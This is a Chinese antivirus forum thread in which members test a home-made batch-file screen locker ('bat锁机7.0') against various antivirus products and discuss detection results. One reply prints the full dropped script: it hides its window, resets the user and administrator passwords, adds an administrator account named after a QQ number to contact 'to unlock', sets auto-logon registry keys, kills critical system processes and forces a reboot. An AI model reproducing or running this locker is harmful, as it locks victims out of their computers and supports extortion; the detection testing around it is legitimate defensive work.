搜索
楼主: 3245076553
收起左侧

[病毒样本] 自制bat锁机7.0

[复制链接]
fever腾腾
发表于 2019-2-10 15:59:16 | 显示全部楼层
费尔扫描 miss 双击miss 脚本报错
我相信这不是我费尔的问题

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
心心相印
发表于 2019-2-10 16:56:08 | 显示全部楼层
fssa kill
huang1111
发表于 2019-2-10 17:31:15 | 显示全部楼层
www-tekeze 发表于 2019-2-10 10:57
说那么多废话干啥? 能杀就截点图介绍下情况,杀不了就别进来玩 。。
什么叫有营养,那些国外的Ba ...

VT上所有大牌杀软都不爆,但是会被.bat文件坑到的基本上是小白
www-tekeze
发表于 2019-2-10 23:49:28 | 显示全部楼层
本帖最后由 www-tekeze 于 2019-2-10 23:57 编辑
海颜贝儿 发表于 2019-2-10 15:43
eset12.1测试版,同样的情况运行出错。他这个有兼容性问题。

我在10楼给过释放的x.bat,问题出在前面那段powershell,如果删了执行情况是这样:1. 首先是命令行添加用户并修改密码。 2. 用taskkill命令杀掉系统进程,强行造成死机。 3. 重启后被锁! x.bat如下,删掉红色部分即可。


@echo off
if "%1"=="h" goto begin
start mshta vbscript:createobject("wscript.shell").run("""%~nx0"" h",0)(window.close)&&exit
:begin
REM

net user %username% fuckyou
net user 解锁加QQ3256076553 fuckyou /add
net localgroup administrators 解锁加QQ3256076553 /add
net user administrator fuckyou
net user admin fuckyou
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v AutoAdminLogon /d 1
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v DefaultUserName /d 解锁加QQ3256076553
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v DefaultPassword /d

for /f %%I in ('wmic process get Name')do (wmic process where Name="%%I" delete)
taskkill /f /im winlogon.exe
taskkill /f /im wininit.exe
taskkill /f /im csrss.exe
taskkill /f /im *.exe
shutdown -r -f -t 00


本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
3245076553
 楼主| 发表于 2019-2-11 07:06:16 | 显示全部楼层
www-tekeze 发表于 2019-2-10 23:49
我在10楼给过释放的x.bat,问题出在前面那段powershell,如果删了执行情况是这样:1. 首先是命令行添加用 ...

6.0也有红色部分,为什么可以成功
安全守护者
发表于 2019-2-11 08:58:16 | 显示全部楼层
huang1111 发表于 2019-2-10 17:31
VT上所有大牌杀软都不爆,但是会被.bat文件坑到的基本上是小白

也只有小白才会中病毒就惊慌失措,乖乖去交智商税
海颜贝儿
发表于 2019-2-11 09:40:16 | 显示全部楼层
www-tekeze 发表于 2019-2-10 23:49
我在10楼给过释放的x.bat,问题出在前面那段powershell,如果删了执行情况是这样:1. 首先是命令行添加用 ...

带主防的测试版依然被锁好失望,全程没反应

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x

评分

参与人数 1人气 +1 收起 理由
www-tekeze + 1 淡定!

查看全部评分

www-tekeze
发表于 2019-2-11 10:32:38 | 显示全部楼层
3245076553 发表于 2019-2-11 07:06
6.0也有红色部分,为什么可以成功

不懂,请@SUARP-BIGNUM 帮你看看。。
www-tekeze
发表于 2019-2-11 10:36:13 | 显示全部楼层
海颜贝儿 发表于 2019-2-11 09:40
带主防的测试版依然被锁好失望,全程没反应

好的行为主防(高拦截低误报)可不是那么容易做到的,E家还有很长的路要走。。
liumailong
发表于 2019-2-11 12:39:34 | 显示全部楼层
毛豆扫描居然把这杀了


小红伞扫描不杀,运行杀。
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛|优惠券| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 苏ICP备07004770号 ) GMT+8, 2019-4-23 02:37 , Processed in 0.038612 second(s), 6 queries , MemCache On.

快速回复 返回顶部 返回列表